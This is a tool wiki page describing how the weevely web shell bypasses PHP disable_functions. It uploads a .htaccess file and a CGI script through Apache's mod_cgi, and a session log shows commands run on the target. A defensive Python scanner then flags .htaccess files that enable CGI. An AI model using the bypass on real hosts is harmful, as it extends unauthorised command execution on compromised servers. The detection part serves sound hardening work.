
Bypass disabled system shell functions via mod_cgi and .htaccess

epinna edited this page Sep 20, 2014 · 1 revision

The following technique was presented in ASDIZZLE's blog article Getting shell access with PHP system functions disabled.

This tutorial shows how to gain shell command execution on hosting servers that do not allow any system-like PHP function: the disabled functions are bypassed by having Apache's mod_cgi run a script uploaded through the PHP agent, with a .htaccess file mapping its extension to the CGI handler.

Configuration

  • Example PHP configuration: disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system
  • Used modules: audit_disablefunctionbypass

Session

The module automatically performs the checks, uploads the .htaccess and the CGI script, and opens a pseudo system shell on the remote server.

$ ./weevely.py http://localhost/asd.php asdasd

[+] weevely 3.2.0

[+] Target:	www-data@target:/var/www/html
[+] Session:	_/weevely/sessions/localhost/asd_0.session
[+] Shell:	PHP interpreter

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> 
www-data@target:/var/www/html PHP> :audit_disablefunctionbypass
[-][disablefunctionbypass] After usage, use ':file_rm' to remove '/var/www/html/.htaccess' and '/var/www/html/acubu.ved'
[-][disablefunctionbypass] Run console without reinstalling with ':audit_disablefunctionbypass -just-run http://localhost/acubu.ved'
[-][disablefunctionbypass] Type 'quit' to return to weevely shell. Requests are not obfuscated
CGI shell replacement $ ps -aux
  PID TTY          TIME CMD
24693 ?        00:00:00 apache2
24694 ?        00:00:00 apache2
24695 ?        00:00:00 apache2
24696 ?        00:00:00 apache2
24697 ?        00:00:00 apache2
24859 ?        00:00:00 acubu.ved
24864 ?        00:00:00 ps

CGI shell replacement $ quit
www-data@emilio-lin:/var/www/html PHP> 

To avoid repeating the installation step every time, you can start the shell replacement console directly against the already uploaded CGI script by pointing the -just-run option at its URL.

www-data@emilio-lin:/var/www/html PHP> :audit_disablefunctionbypass -just-run http://localhost/acubu.ved
[-][disablefunctionbypass] Type 'quit' to return to weevely shell. Requests are not obfuscated
CGI shell replacement $ whoami
www-data

CGI shell replacement $
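From the hosting administrator's side, the bypass shown above only works because Apache honours a .htaccess file dropped into the web root that turns an arbitrary extension (here .ved) into a CGI handler. The following Python script is an added example written for this page, not code from weevely or from the blog article it cites: it walks a document root, reports every .htaccess that enables CGI execution (AddHandler/SetHandler cgi-script, Options +ExecCGI, AddType application/x-httpd-cgi), and builds a constructed web root to demonstrate the scan. The directive patterns are standard Apache syntax; the temporary directory layout and its contents are constructed for the demo.

```python
"""Audit an Apache document root for .htaccess files that enable CGI execution.

Added example for this wiki page (not part of weevely). The mod_cgi bypass
relies on a writable web root plus an AllowOverride setting that lets
.htaccess carry 'Options' and 'FileInfo' directives. The durable fix is
'AllowOverride None' (or at least removing Options and FileInfo from the
AllowOverride list); this scanner is the detection side for hosts where
that is not yet in place.
"""
import os
import re
import tempfile

# Directives that, when honoured from .htaccess, turn a directory into a
# CGI launcher. Apache directive names are case-insensitive.
CGI_PATTERNS = [
    re.compile(r"^\s*AddHandler\s+cgi-script\b", re.I),
    re.compile(r"^\s*SetHandler\s+cgi-script\b", re.I),
    re.compile(r"^\s*Options\b.*\bExecCGI\b", re.I),
    re.compile(r"^\s*AddType\s+application/x-httpd-cgi\b", re.I),
]


def suspicious_lines(text):
    """Return (line_no, line) pairs of a .htaccess body that enable CGI."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):  # Apache comments are whole lines
            continue
        if any(p.search(line) for p in CGI_PATTERNS):
            hits.append((n, line.strip()))
    return hits


def scan_webroot(root):
    """Walk a document root; map each .htaccess that enables CGI to its hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = suspicious_lines(fh.read())
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        if hits:
            findings[path] = hits
    return findings


def demo():
    """Constructed web root: one benign .htaccess and one that enables CGI."""
    root = tempfile.mkdtemp(prefix="webroot-demo-")
    os.makedirs(os.path.join(root, "uploads"))
    # Benign: a rewrite rule, the kind of .htaccess a site legitimately ships.
    with open(os.path.join(root, ".htaccess"), "w") as fh:
        fh.write("RewriteEngine On\nRewriteRule ^old$ /new [R=301]\n")
    # Constructed: the two directives a disable_functions bypass needs.
    with open(os.path.join(root, "uploads", ".htaccess"), "w") as fh:
        fh.write("# constructed sample for the scanner demo\n"
                 "Options +ExecCGI\n"
                 "AddHandler cgi-script .ved\n")
    return scan_webroot(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        print(path)
        for line_no, line in hits:
            print(f"  line {line_no}: {line}")
```

Run it as a cron job against /var/www (or your hosting panel's document roots) and alert on any finding; a legitimate site rarely needs CGI enabled from .htaccess, and a hit in a writable upload directory is a strong indicator that the web application itself has been compromised.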